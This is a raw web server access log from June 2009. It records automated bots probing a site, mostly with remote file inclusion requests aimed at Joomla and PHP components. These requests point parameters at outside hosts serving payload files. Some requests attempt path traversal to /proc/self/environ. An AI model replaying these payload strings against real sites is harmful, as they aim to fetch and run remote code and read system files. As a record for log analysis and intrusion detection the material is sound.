78.24.219.48 - - [06/Jun/2009:05:47:08 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
75.145.152.113 - - [06/Jun/2009:05:47:34 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
75.145.152.113 - - [06/Jun/2009:05:47:34 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/admin/admin.php?vwar_root=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
75.145.152.113 - - [06/Jun/2009:05:47:34 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
75.145.152.113 - - [06/Jun/2009:05:47:59 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:05:48:06 -0400] "GET /index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:05:48:06 -0400] "GET /logs/index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:05:48:06 -0400] "GET /logs/access_log.Q109052500%20%20/index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:05:49:30 -0400] "GET /logs/access_log.Q109052300%20%20/index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.131.116.12 - - [06/Jun/2009:05:50:59 -0400] "GET /logs/access_log.Q109052900%20%20//OLE.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.17.99.13 - - [06/Jun/2009:05:51:16 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:51:16 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
209.59.12.99 - - [06/Jun/2009:05:51:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.150.52.114 - - [06/Jun/2009:05:52:07 -0400] "GET /logs/error_log.Q109022100//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://corect.at.ua/idv4.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
212.150.52.114 - - [06/Jun/2009:05:52:07 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://corect.at.ua/idv4.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
212.150.52.114 - - [06/Jun/2009:05:52:07 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://corect.at.ua/idv4.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
222.239.76.25 - - [06/Jun/2009:05:52:13 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.239.76.25 - - [06/Jun/2009:05:52:13 -0400] "GET /logs/access_log.Q109053100/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.239.76.25 - - [06/Jun/2009:05:52:13 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
216.17.99.13 - - [06/Jun/2009:05:52:35 -0400] "GET /logs/access_log.Q109051600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
66.194.152.139 - - [06/Jun/2009:05:52:51 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://hecaru.by.ru/id/id.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.76"
125.131.116.12 - - [06/Jun/2009:05:53:12 -0400] "GET /logs/access_log.Q109050700%20%20//OLE.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.17.99.13 - - [06/Jun/2009:05:53:43 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:53:43 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:53:48 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:53:59 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:54:28 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:54:29 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:54:47 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:54:47 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:05:55:13 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
201.232.54.48 - - [06/Jun/2009:05:55:29 -0400] "GET /logs/access_log.Q109052500/index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
194.110.162.91 - - [06/Jun/2009:05:55:33 -0400] "GET /logs/access_log.Q109041300 HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
216.17.99.13 - - [06/Jun/2009:05:55:52 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:55:52 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:55:53 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:55:53 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
201.232.54.48 - - [06/Jun/2009:05:56:04 -0400] "GET /logs/access_log.Q109052300/index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.17.99.13 - - [06/Jun/2009:05:56:28 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:56:32 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:56:36 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
78.111.80.18 - - [06/Jun/2009:05:56:37 -0400] "GET /logs/access_log.Q109050300//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
78.111.80.18 - - [06/Jun/2009:05:56:45 -0400] "GET /logs/access_log.Q109052100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
216.17.99.13 - - [06/Jun/2009:05:56:45 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
82.151.132.176 - - [06/Jun/2009:05:56:50 -0400] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
82.151.132.176 - - [06/Jun/2009:05:56:50 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
82.151.132.176 - - [06/Jun/2009:05:56:50 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
82.151.132.176 - - [06/Jun/2009:05:56:54 -0400] "GET /logs/access_log.Q109052100%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
216.17.99.13 - - [06/Jun/2009:05:56:59 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
209.59.12.99 - - [06/Jun/2009:05:57:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.151.132.176 - - [06/Jun/2009:05:57:32 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
82.151.132.176 - - [06/Jun/2009:05:57:32 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
82.151.132.176 - - [06/Jun/2009:05:57:32 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
82.151.132.176 - - [06/Jun/2009:05:57:36 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
216.17.99.13 - - [06/Jun/2009:05:57:42 -0400] "GET /logs/access_log.Q109051600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:05:57:57 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:05:57:58 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:05:58:03 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
77.221.130.2 - - [06/Jun/2009:05:58:11 -0400] "GET /es_offer.php?files_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 210 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:58:11 -0400] "GET /logs/es_offer.php?files_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 215 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:58:11 -0400] "GET /es_offer.php?files_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 210 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:05:58:11 -0400] "GET /logs/es_offer.php?files_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 215 "-" "XXXXXX"
216.17.99.13 - - [06/Jun/2009:05:58:39 -0400] "GET /logs/access_log.Q109051000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:58:39 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:58:47 -0400] "GET /logs/access_log.Q109050300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:05:58:47 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:05:58:53 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:05:58:54 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
211.202.2.220 - - [06/Jun/2009:05:59:04 -0400] "GET //?path%5Bdocroot%5D=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt???? HTTP/1.1" 200 452 "-" "libwww-perl/5.79"
211.202.2.220 - - [06/Jun/2009:05:59:05 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt???? HTTP/1.1" 200 4371 "-" "libwww-perl/5.79"
211.202.2.220 - - [06/Jun/2009:05:59:05 -0400] "GET /logs/error_log.Q109051800//?path%5Bdocroot%5D=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt???? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
216.17.99.13 - - [06/Jun/2009:05:59:05 -0400] "GET /logs/access_log.Q109051600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
201.232.54.48 - - [06/Jun/2009:05:59:05 -0400] "GET /logs/access_log.Q109050700//index.php//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
78.24.219.48 - - [06/Jun/2009:05:59:15 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:05:59:15 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
74.6.8.112 - - [06/Jun/2009:05:59:20 -0400] "GET /logs/error_log.Q108122300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
78.24.219.48 - - [06/Jun/2009:05:59:34 -0400] "GET /logs/access_log.Q109051600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
211.202.2.220 - - [06/Jun/2009:05:59:48 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt???? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
78.24.219.48 - - [06/Jun/2009:05:59:51 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:05:59:51 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
75.145.152.113 - - [06/Jun/2009:06:00:01 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
75.145.152.113 - - [06/Jun/2009:06:00:08 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://stonemac.com/bbs/g/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.73.144.26 - - [06/Jun/2009:06:00:24 -0400] "GET /logs/access_log.Q109052200/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.810"
69.73.144.26 - - [06/Jun/2009:06:00:24 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.810"
69.73.144.26 - - [06/Jun/2009:06:00:25 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.810"
78.24.219.48 - - [06/Jun/2009:06:01:00 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:06:01:01 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:06:01:04 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:06:01:07 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:06:01:19 -0400] "GET /logs/access_log.Q109051600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
218.145.31.131 - - [06/Jun/2009:06:01:36 -0400] "GET /index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:06:01:36 -0400] "GET /logs/index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.145.31.131 - - [06/Jun/2009:06:01:36 -0400] "GET /logs/access_log.Q109052500/index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.239.76.25 - - [06/Jun/2009:06:01:42 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
222.239.76.25 - - [06/Jun/2009:06:01:42 -0400] "GET //?path%5Bdocroot%5D=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
222.239.76.25 - - [06/Jun/2009:06:01:42 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt?? HTTP/1.1" 200 4371 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
216.17.99.13 - - [06/Jun/2009:06:01:43 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 216 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:06:01:53 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
222.255.37.201 - - [06/Jun/2009:06:02:00 -0400] "GET /logs/error_log.Q109022100//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://klean-tech.com.tw/upload/idv4.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
222.255.37.201 - - [06/Jun/2009:06:02:00 -0400] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://klean-tech.com.tw/upload/idv4.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
222.255.37.201 - - [06/Jun/2009:06:02:01 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://klean-tech.com.tw/upload/idv4.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
78.24.219.48 - - [06/Jun/2009:06:02:22 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
209.59.12.99 - - [06/Jun/2009:06:02:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.239.76.25 - - [06/Jun/2009:06:02:55 -0400] "GET /logs/error_log.Q109051800//?path%5Bdocroot%5D=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
222.239.76.25 - - [06/Jun/2009:06:02:56 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
222.239.76.25 - - [06/Jun/2009:06:02:56 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
222.239.76.25 - - [06/Jun/2009:06:02:56 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.239.76.25 - - [06/Jun/2009:06:03:05 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
218.145.31.131 - - [06/Jun/2009:06:03:24 -0400] "GET /logs/access_log.Q109052300/index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
78.24.219.48 - - [06/Jun/2009:06:03:45 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:06:03:46 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
